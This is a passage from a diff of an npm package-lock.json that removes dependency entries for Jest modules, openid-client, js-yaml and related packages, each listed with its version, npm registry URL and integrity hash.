"sha512-q617Auw3A612guyaFgsbFeYpNP5t2aoUNLwBUbc/0kD1R4t9ixDbyFTHd1nok4epoVFpr7PmeWHrhvuV3XaJ4g==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-each": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.7.0.tgz", - "integrity": "sha512-gns+Er14+ZrEoC5fhOfYCY1LOHHr0TI+rQUHZS8Ttw2l7gl+80eHc/gFf2Ktkw0+SIACDTeWvpFcv3B04VembQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "jest-util": "^29.7.0", - "pretty-format": "^29.7.0" - } - }, - "jest-environment-node": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.7.0.tgz", - "integrity": "sha512-DOSwCRqXirTOyheM+4d5YZOrWcdu0LNZ87ewUoywbcb2XR4wKgqiG8vNeYwhjFMbEkfju7wx2GYH0P2gevGvFw==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "jest-get-type": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.6.3.tgz", - "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==", - "dev": true - }, - "jest-haste-map": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.7.0.tgz", - "integrity": "sha512-fP8u2pyfqx0K1rGn1R9pyE0/KTn+G7PxktWidOBTqFPLYX0b9ksaMFkhK5vrS3DVun09pckLdlx90QthlW7AmA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.7.0.tgz", - "integrity": "sha512-kYA8IJcSYtST2BY9I+SMC32nDpBT3J2NvWJx8+JCuCdl/CR1I4EKUJROiP8XtCcxqgTTBGJNdbB1A8XRKbTetw==", - "dev": true, - "requires": { - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-matcher-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.7.0.tgz", - "integrity": "sha512-sBkD+Xi9DtcChsI3L3u0+N0opgPYnCRPtGcQYrgXmR+hmt/fYfWAL0xRXYU8eWOdfuLgBe0YCW3AFtnRLagq/g==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-message-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.7.0.tgz", - "integrity": "sha512-GBEV4GRADeP+qtB2+6u61stea8mGcOT4mCtrYISZwfu9/ISHFJ/5zOMXYbpBE9RsS5+Gb63DW4FgmnKJ79Kf6w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.7.0.tgz", - "integrity": "sha512-ITOMZn+UkYS4ZFh83xYAOzWStloNzJFO2s8DWrE4lhtGD+AorgnbkiKERe4wQVBydIGPx059g6riW5Btp6Llnw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-util": "^29.7.0" - } - }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} - }, - "jest-regex-util": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.6.3.tgz", - "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==", - "dev": true - }, - "jest-resolve": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.7.0.tgz", - "integrity": "sha512-IOVhZSrg+UvVAshDSDtHyFCCBUl/Q3AAJv8iZ6ZjnZ74xzvwuzLXid9IIIPgTnY62SJjfuupMKZsZQRsCvxEgA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - } - }, - "jest-resolve-dependencies": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.7.0.tgz", - "integrity": "sha512-un0zD/6qxJ+S0et7WxeI3H5XSe9lTBBR7bOHCHXkKR6luG5mwDDlIzVQ0V5cZCuoTgEdcdwzTghYkTWfubi+nA==", - "dev": true, - "requires": { - "jest-regex-util": "^29.6.3", - "jest-snapshot": "^29.7.0" - } - }, - "jest-runner": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.7.0.tgz", - "integrity": "sha512-fsc4N6cPCAahybGBfTRcq5wFR6fpLznMg47sY5aDpsoejOcVYFb07AHuSnR0liMcPTgBsA3ZJL6kFOjPdoNipQ==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/environment": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-leak-detector": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-resolve": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-util": "^29.7.0", - "jest-watcher": "^29.7.0", - "jest-worker": "^29.7.0", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runtime": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.7.0.tgz", - "integrity": "sha512-gUnLjgwdGqW7B4LvOIkbKs9WGbn+QLqRQQ9juC6HndeDiezIwhDP+mhMwHWCEcfQ5RUXa6OPnFF8BJh5xegwwQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/globals": "^29.7.0", - "@jest/source-map": "^29.6.3", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - } - }, - "jest-snapshot": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.7.0.tgz", - "integrity": "sha512-Rm0BMWtxBcioHr1/OX5YCP8Uov4riHvKPknOGs804Zg9JGZgmIBkbtlxJC/7Z4msKYVbIJtfU+tKb8xlYNfdkw==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "natural-compare": "^1.4.0", - "pretty-format": "^29.7.0", - "semver": "^7.5.3" - }, - "dependencies": { - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "jest-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", - "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.7.0.tgz", - "integrity": "sha512-ZB7wHqaRGVw/9hST/OuFUReG7M8vKeq0/J2egIGLdvjHCmYqGARhzXmtgi+gVeZ5uXFF219aOc3Ls2yLg27tkw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "leven": "^3.1.0", - "pretty-format": "^29.7.0" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true - } - } - }, - "jest-watcher": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.7.0.tgz", - "integrity": "sha512-49Fg7WXkU3Vl2h6LbLtMQ/HyB6rXSIX7SqvBLQmssRBGN9I0PNvPmAmCWSOY6SOvrjhI/F7/bGAv9RtnsPA03g==", - "dev": true, - "requires": { - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.7.0", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.7.0.tgz", - "integrity": "sha512-eIz2msL/EzL9UFTFFx7jBTkeZfku0yUAyZZZmJ93H2TYEiroIx2PQjEXcwYtYl8zXCxb+PAmA2hLIt/6ZEkPHw==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.7.0", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "dependencies": { - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "jose": { - "version": "4.15.5", - "resolved": "https://registry.npmjs.org/jose/-/jose-4.15.5.tgz", - "integrity": "sha512-jc7BFxgKPKi94uOvEmzlSWFFe2+vASyXaKUpdQKatWAESU2MWjDfFf0fdfc83CDKcA5QecabZeNLyfhe3yKNkg==", - "dev": true, - "optional": true - }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - } - }, - "jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=", - "dev": true - }, - "jsesc": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-3.0.2.tgz", - "integrity": "sha512-xKqzzWXDttJuOcawBt4KnKHHIf5oQ/Cxax+0PWFG+DFDgHNAdi+TXECADI+RYiFUMmx8792xsMbbgXj4CwnP4g==", - "dev": true - }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==", - "dev": true - }, - "json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==", - "dev": true - }, - "json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=", - "dev": true - }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true - }, - "jsonpath-plus": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-7.2.0.tgz", - "integrity": "sha512-zBfiUPM5nD0YZSBT/o/fbCUlCcepMIdP0CJZxM1+KgA4f2T206f6VAg9e7mX35+KlMaIc5qXW34f3BnwJ3w+RA==", - "dev": true - }, - "jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "dev": true, - "requires": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - } - }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true - }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true - }, - "lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "lodash.memoize": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", - "dev": true - }, - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "optional": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "make-dir": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-4.0.0.tgz", - "integrity": "sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==", - "dev": true, - "requires": { - "semver": "^7.5.3" - }, - "dependencies": { - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "make-error": { - "version": "1.3.6", - "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", - "dev": true - }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "requires": { - "tmpl": "1.0.5" - } - }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "requires": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - } - }, - "mime-db": { - "version": "1.49.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.49.0.tgz", - "integrity": "sha512-CIc8j9URtOVApSFCQIF+VBkX1RwXp/oMMOrqdyXSBXq5RWNEsRfyj1kiRnQgmNXmHxPoFIxOroKA3zcU9P+nAA==", - "dev": true - }, - "mime-types": { - "version": "2.1.32", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.32.tgz", - "integrity": "sha512-hJGaVS4G4c9TSMYh2n6SQAGrC4RnfU+daP8G7cSCmaqNjiOoUY0VHCMS42pxnQmVF1GWwFhbHWn3RIxCqTmZ9A==", - "dev": true, - "requires": { - "mime-db": "1.49.0" - } - }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true - }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "requires": { - "brace-expansion": "^1.1.7" - } - }, - "minipass": { - "version": "3.1.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.1.6.tgz", - "integrity": "sha512-rty5kpw9/z8SX9dmxblFA6edItUmwJgMeYDZRrwlIVN27i8gysGbznJwUggw2V/FVqFSDdWy040ZPS811DYAqQ==", - "dev": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "minizlib": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", - "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", - "dev": true, - "requires": { - "minipass": "^3.0.0", - "yallist": "^4.0.0" - } - }, - "mkdirp": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", - "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", - "dev": true - }, - "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node-releases": { - "version": "2.0.18", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.18.tgz", - "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==", - "dev": true - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true - }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "requires": { - "path-key": "^3.0.0" - } - }, - "oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", - "dev": true - }, - "object-hash": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-2.2.0.tgz", - "integrity": "sha512-gScRMn0bS5fH+IuwyIFgnh9zBdo4DV+6GhygmWM9HyNJSgS0hScp1f5vjtm7oIIOiT9trXrShAkLFSc2IqKNgw==", - "dev": true, - "optional": true - }, - "oidc-token-hash": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/oidc-token-hash/-/oidc-token-hash-5.0.1.tgz", - "integrity": "sha512-EvoOtz6FIEBzE+9q253HsLCVRiK/0doEJ2HCvvqMQb3dHZrP3WlJKYtJ55CRTw4jmYomzH4wkPuCj/I3ZvpKxQ==", - "dev": true, - "optional": true - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha1-WDsap3WWHUsROsF9nFC6753Xa9E=", - "dev": true, - "requires": { - "wrappy": "1" - } - }, - "onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "requires": { - "mimic-fn": "^2.1.0" - } - }, - "openid-client": { - "version": "5.4.0", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-5.4.0.tgz", - "integrity": "sha512-hgJa2aQKcM2hn3eyVtN12tEA45ECjTJPXCgUh5YzTzy9qwapCvmDTVPWOcWVL0d34zeQoQ/hbG9lJhl3AYxJlQ==", - "dev": true, - "optional": true, - "requires": { - "jose": "^4.10.0", - "lru-cache": "^6.0.0", - "object-hash": "^2.0.1", - "oidc-token-hash": "^5.0.1" - } - }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "requires": { - "p-limit": "^2.2.0" - }, - "dependencies": { - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - } - } - }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true - }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - } - }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true - }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": 